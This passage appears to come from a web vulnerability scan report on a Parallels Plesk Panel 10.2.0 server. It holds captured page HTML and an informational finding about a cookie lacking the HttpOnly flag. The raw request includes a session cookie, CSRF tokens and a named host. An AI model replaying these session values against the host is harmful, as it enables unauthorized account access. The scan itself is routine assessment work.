<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%2F%3Fdst%3D%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fhosting%252Ffile-manager%252F%253Fcmd%253Dchdir%2526file%253D%252Fhttpdocs%26src%3D%252Fsmb%252Fweb%252Fview%252Fid%252F1%252FsiteId%252F1%26srcController%3DWebController' + '&activeModule=' + 'webSitesAndDomains' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"active","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>SSL Certificates</span></h2>
</div>
</div>


<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Invalid URL was requested. </div>
</div></div></div></div></div></div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/client.domain.certificate/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/hosting-panel=web.view/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;

       function send_cert_oC(f)
       {
           if (f.cert_f.value == "") {
               alert("Select a certificate file");
               f.cert_f.focus();
               return false;
           }
           f.cmd.value="find";
           lsubmit(f);
           return false;
       }

       function demo()
       {
           alert("This function is not available in the demo version.");
       }
       
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/certificate@" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="3e86204e9517123c7f585d736d64aa3f">
   <input type="hidden" name="cmd" value="setFilter">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   <p>SSL certificates are used for securing transfer of sensitive data sent to your website by its visitors, and for verifying the site identity.</p>
<p>After adding an SSL certificate to a domain, you need to enable SSL support and select that certificate in the website hosting settings.</p>

<div class="toolsArea">
   <fieldset>
       <legend>Tools</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       <div class="screenButtons">
           <DIV class="commonButton" id="bid-cert-add" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Add a new SSL certificate.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/certificate@new/properties/&#039;); return false;" style=""><BUTTON name="bname_cert_add" id="buttonid-cert-add" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/certificate@new/properties/&#039;); return false;">Add SSL Certificate</BUTTON><SPAN id="spanid-cert-add">Add SSL Certificate</SPAN></DIV>
           <DIV class="commonButton" id="bid-cert-view" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;View the list of SSL certificates that you purchased from your provider.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/mpc-certificates/&#039;); return false;" style=""><BUTTON name="bname_cert_view" id="buttonid-cert-view" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/mpc-certificates/&#039;); return false;">View Certificates</BUTTON><SPAN id="spanid-cert-view">View Certificates</SPAN></DIV>
           
       </div>

   </td></tr></table></fieldset>
</div>

<div class="formArea">
   <fieldset>
       <legend>Find the appropriate private key to a certificate</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       <table class="formFields" width="100%" cellspacing="0" >
           <tr>
               <td class="name"><label for="fid-cert_f">Certificate</label></td>
               <td><input type="file" id="fid-cert_f" name="cert_f"></td>
           </tr>
       </table>

       <div class="formButtons">
           <DIV class="commonButton" id="bid-send-file" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Find the appropriate private key for the uploaded certificate.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);return send_cert_oC(document.forms[0]);return false;" style=""><BUTTON name="bname_send_file" id="buttonid-send-file" type="button" onClick="Event.stop(event);return send_cert_oC(document.forms[0]);return false;">Send File</BUTTON><SPAN id="spanid-send-file">Send File</SPAN></DIV>
       </div>

   </td></tr></table></fieldset>
</div>

<div class="listArea">
   <fieldset>
       <legend>Certificates</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       
           <script>
           function r(event)    { tooltip.set(event, [{"type":"string","string":"CSR part supplied."}]); }        // request
           function nr(event)    { tooltip.set(event, [{"type":"string","string":"CSR part not supplied."}]); }        // no request
           function p(event)    { tooltip.set(event, [{"type":"string","string":"Private key part supplied."}]); }    // private key
           function np(event)    { tooltip.set(event, [{"type":"string","string":"Private key part not supplied."}]); }    // no private key
           function c(event)    { tooltip.set(event, [{"type":"string","string":"Certificate part supplied."}]); }        // certificate
           function nc(event)    { tooltip.set(event, [{"type":"string","string":"Certificate part not supplied."}]); }    // no certificate
           function a(event)    { tooltip.set(event, [{"type":"string","string":"CA Certificate part supplied."}]); }    // ca certificate
           function na(event)    { tooltip.set(event, [{"type":"string","string":"CA Certificate part not supplied."}]); }    // no ca certificate
           function mo()    { tooltip.hide(); }                    // reset conhelp
           
           </script>
       <div class="paging pagingTop noList">No SSL certificates</div><div class="paging pagingBottom noList"></div><script>SetCookie("certificateslist", "YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9");
           function CertificatesListSetPaging(page)
           {
               var f = document.forms[0];
               f.page.value = page;
               f.cmd.value = "setPage";
               lsubmit(f);
               return false;
           }

           function CertificatesListSetPageSize(page_size)
           {
               var f = document.forms[0];
               f.page_size.value = page_size;
               f.cmd.value = "setPageSize";
               lsubmit(f);
               return false;
           }
       
           function CertificatesListSelectionGet()
           {
               var f = document.forms[0];
               var selection = new Array();
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled) && f.elements[i].checked) {
                           selection.push(f.elements[i].value);
                       }
                   }
               }
               return selection;
           }
           function CertificatesListSelect()
           {
               f = document.forms[0];
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled)) {
                           f.elements[i].checked = f.CertificatesListSelectAll.checked;
                           CertificatesListSelectOnChange(f.elements[i]);
                       }
                   }
               }
               return true;
           }
       
           function CertificatesListSelectOnChange(o)
           {
               o = $(o);
               if ("radio" == o.type) {
                   $$("input[name='" + o.name + "']").each(function(el){
                       el.up("tr").removeClassName("selected");
                   });
               }

               if (o.checked)
                   o.up("tr").addClassName("selected");
               else
                   o.up("tr").removeClassName("selected");

               return true;
           }
       
           function CertificatesListSort(sort)
           {
               f = document.forms[0];
               f.sort.value = sort;
               f.cmd.value = "setSort";
               lsubmit(f);
               return false;
           }
       
           function CertificatesListFilter(f)
           {
               
               if (f.filter.value.length == 0) {
                   CertificatesListShowAll(f);
                   return false;
               }
       
               f.cmd.value = "setFilter";
               lsubmit(f);
               return false;
           }
       
           function CertificatesListShowAll(f)
           {
               f.cmd.value = "clearFilter";
               lsubmit(f);
               return false;
           }
       
           function CertificatesListSearchShow()
           {
               var sc = document.getElementById("CertificatesListSearchControl");
               if (sc) {
                   removeClass(sc, "hide");
                   addClass(sc, "show");
               }

               var s = document.getElementById("CertificatesListSearch");
               if (s) {
                   removeClass(s, "hide");
                   addClass(s, "show");
               }

               SetPermanentCookie("cListShowSearch", 1);
           }
       
           function CertificatesListSearchHide()
           {
               var sc = document.getElementById("CertificatesListSearchControl");
               if (sc) {
                   removeClass(sc, "show");
                   addClass(sc, "hide");
               }

               var s = document.getElementById("CertificatesListSearch");
               if (s) {
                   removeClass(s, "show");
                   addClass(s, "hide");
               }

               SetPermanentCookie("cListShowSearch", 0);
           }
       
           function CertificatesListRemove(f)
           {
               if (0 == CertificatesListSelectionGet().length) {
                   alert("No objects selected.");
                   return false;
               }
               f.cmd.value = "remove";
               f.action = "/plesk/client@2/domain@1/certificate@";
               lsubmit(f);
               return false;
           }
       </script>

   </td></tr></table></fieldset>
</div>




</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5.19. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/dns/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/dns/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@2/domain@1/dns/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: domainaliaseslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domaintrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:16:52 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:16:53 GMT
Connection: close
Content-Length: 31972

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%2F%3Fdst%3D%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fdns%252F%26src%3D%252Fsmb%252Fweb%252Fview%252Ftype%252Fdns%26srcController%3DWebController' + '&activeModule=' + 'webSitesAndDomains' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"active","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;DNS zone is enabled.&quot;&#125;]);" onMouseOut="tooltip.hide();"><IMG src="/skins/default/plesk/icons/on.gif" width="16" height="16" alt="on.gif" title=""></a> This server acts as a primary nameserver for the DNS zone <span class="name">nosedivesailing.com</span></span></h2>
</div>
</div>


<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Invalid URL was requested. </div>
</div></div></div></div></div></div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/client.domain.dns/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/hosting-panel=web.view/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;

       function turnOn(f)
       {
           f.cmd.value = "turnOn";
           lsubmit(f);
       }
       function turnOff(f)
       {
           f.cmd.value = "turnOff";
           lsubmit(f);
       }
       function switchMaster(f)
       {
           f.cmd.value = "switchMaster";
           lsubmit(f);
       }
       function switchSlave(f)
       {
           f.cmd.value = "switchSlave";
           lsubmit(f);
       }
       
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>

<div id="screenTabs"><div id="tabs"><ul><li class="first" id="current"><A href="/plesk/client@2/domain@1/dns/" onClick=";lon();" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Manage DNS zone settings for domain vulnerable.host.fqdn.&quot;&#125;]);" onMouseOut="tooltip.hide();"><span>DNS Settings</span></a></li><li><A href="/plesk/client@2/domain@1/dns/soa-record/properties/" onClick=";lon();" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Edit the SOA record of the DNS zone vulnerable.host.fqdn&quot;&#125;]);" onMouseOut="tooltip.hide();"><span>SOA Record</span></a></li><li class="last"><A href="/plesk/client@2/domain@1/dns/acl-record@/" onClick=";lon();" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;The list of networks allowed to get a copy of DNS zone.&quot;&#125;]);" onMouseOut="tooltip.hide();"><span>Zone Transfers</span></a></li></ul></div></div>
<form action="/plesk/client@2/domain@1/dns/" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
   <input type="hidden" name="cmd" value="update">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   

<div class="toolsArea">
   <fieldset>
       <legend>Tools</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       <div class="screenButtons">
           <DIV class="commonButton" id="bid-disable" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Switch off the DNS service for the DNS zone vulnerable.host.fqdn.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/dns/toggle/&#039;); return false;" style=""><BUTTON name="bname_disable" id="buttonid-disable" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/dns/toggle/&#039;); return false;">Switch Off the DNS Service</BUTTON><SPAN id="spanid-disable">Switch Off the DNS Service</SPAN></DIV>
           <DIV class="commonButton" id="bid-switch" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Make the DNS server act as a slave for the zone vulnerable.host.fqdn.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/dns/toggle-type/&#039;); return false;" style=""><BUTTON name="bname_switch" id="buttonid-switch" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/dns/toggle-type/&#039;); return false;">Switch DNS Service Mode</BUTTON><SPAN id="spanid-switch">Switch DNS Service Mode</SPAN></DIV>
           <DIV class="commonButton" id="bid-dnsrecord-add" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Create new resource record in vulnerable.host.fqdn&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/dns/resource-record@new/properties/&#039;); return false;" style=""><BUTTON name="bname_dnsrecord_add" id="buttonid-dnsrecord-add" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/dns/resource-record@new/properties/&#039;); return false;">Add Record</BUTTON><SPAN id="spanid-dnsrecord-add">Add Record</SPAN></DIV>
           
           <DIV class="commonButton" id="bid-default" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Restore the default records in the DNS zone vulnerable.host.fqdn.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/dns/default/&#039;); return false;" style=""><BUTTON name="bname_default" id="buttonid-default" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/dns/default/&#039;); return false;">Restore Defaults</BUTTON><SPAN id="spanid-default">Restore Defaults</SPAN></DIV>
       </div>

   </td></tr></table></fieldset>
</div>

<div class="listArea">

<fieldset>

<legend>DNS records</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

<div id="DNSZoneListSearch" class="actions-box show"><table width="100%" cellspacing="0" class="buttons"><tr><td class="main"><div><DIV class="commonButton" id="bid-remove-selected" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Delete the selected DNS records.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);DNSZoneListRemove(document.forms[0]);return false;" style=""><BUTTON name="bname_remove_selected" id="buttonid-remove-selected" type="button" onClick="Event.stop(event);DNSZoneListRemove(document.forms[0]);return false;">Remove</BUTTON><SPAN id="spanid-remove-selected">Remove</SPAN></DIV></div></td><td class="misc"><div id="DNSZoneListSearchControl" class="show"><DIV class="commonButton" id="bid-search-show" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to show search area.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);DNSZoneListSearchShow();;return false;" style=""><BUTTON name="bname_search_show" id="buttonid-search-show" type="button" onClick="Event.stop(event);DNSZoneListSearchShow();;return false;">Show Search</BUTTON><SPAN id="spanid-search-show">Show Search</SPAN></DIV><DIV class="commonButton" id="bid-search-hide" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to hide search area.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);DNSZoneListSearchHide();;return false;" style=""><BUTTON name="bname_search_hide" id="buttonid-search-hide" type="button" onClick="Event.stop(event);DNSZoneListSearchHide();;return false;">Hide Search</BUTTON><SPAN id="spanid-search-hide">Hide Search</SPAN></DIV></div></td></tr></table><table width="100%" cellspacing="0" class="searchArea buttons"><tr><td class="main"><div><TABLE cellspacing="0" class="searchSimple"><TR><TD><input type="text" name="filter" id="searchInput" value="" size="20" maxlength="245"></TD><TD><DIV class="commonButton" id="bid-search" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Enter a search pattern and click to find DNS records.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);DNSZoneListFilter(document.forms[0]);return false;" style=""><BUTTON name="bname_search" id="buttonid-search" type="submit" onClick="Event.stop(event);DNSZoneListFilter(document.forms[0]);return false;">Search</BUTTON><SPAN id="spanid-search">Search</SPAN><INPUT type="image" style="border: 0pt none ; height: 0pt; width: 0pt; position: absolute; left: -9999px;" src="/skins/default/plesk/images/1x1.gif"></DIV><DIV class="commonButton" id="bid-show-all" 